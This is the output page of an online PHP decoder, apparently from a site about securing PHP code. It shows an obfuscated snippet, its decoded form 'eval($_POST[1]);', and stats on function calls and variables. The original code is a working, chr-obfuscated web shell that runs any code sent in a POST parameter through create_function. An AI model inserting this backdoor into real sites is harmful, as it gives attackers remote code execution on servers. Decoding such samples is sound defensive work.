Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_chr = chr(99).chr(104).chr(114); $_eval_post_1 = $_chr(101).$_chr(118).$..

Decoded Output download

eval($_POST[1]);

Did this file decode correctly?

Original Code

<?php
    $_chr = chr(99).chr(104).chr(114);  
    $_eval_post_1 = $_chr(101).$_chr(118).$_chr(97).$_chr(108).$_chr(40).$_chr(36).$_chr(95).$_chr(80).$_chr(79).$_chr(83).$_chr(84).$_chr(91).$_chr(49).$_chr(93).$_chr(41).$_chr(59); 
    $_create_function = $_chr(99).$_chr(114).$_chr(101).$_chr(97).$_chr(116).$_chr(101).$_chr(95).$_chr(102).$_chr(117).$_chr(110).$_chr(99).$_chr(116).$_chr(105).$_chr(111).$_chr(110);

    $_= $_create_function("",$_eval_post_1);
    @$_();
?>

Function Calls

chr 34
null 1
create_function 1

Variables

$_ None
$_chr chr
$_eval_post_1 eval($_POST[1]);
$_create_function create_function

Stats

MD5 3603f99f70872b462a7d877ebacc8926
Eval Count 1
Decode Time 138 ms